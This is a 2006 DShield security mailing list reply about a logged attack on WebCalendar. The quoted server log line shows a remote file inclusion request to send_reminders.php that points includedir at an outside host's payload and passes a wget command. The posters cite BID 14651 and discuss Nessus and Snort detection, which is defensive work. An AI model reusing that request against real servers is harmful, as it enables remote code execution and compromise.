[Dshield] Webcal Exploit?

Frank Knobbe frank at knobbe.us
Mon Feb 6 23:52:38 GMT 2006


On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> > http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > HTTP/1.0" 302 290
> 
> Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
> August:

I see your August and raise you March. Seems like we had a BleedingSnort
rule for this at least since March 2005.
http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/WEB/WEB_PHP_Injection?view=markup

Thanks for the BID reference, I'll add that shortly to the sig.

Cheers,
Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://www.dshield.org/pipermail/list/attachments/20060206/a412839f/attachment.bin


More information about the list mailing list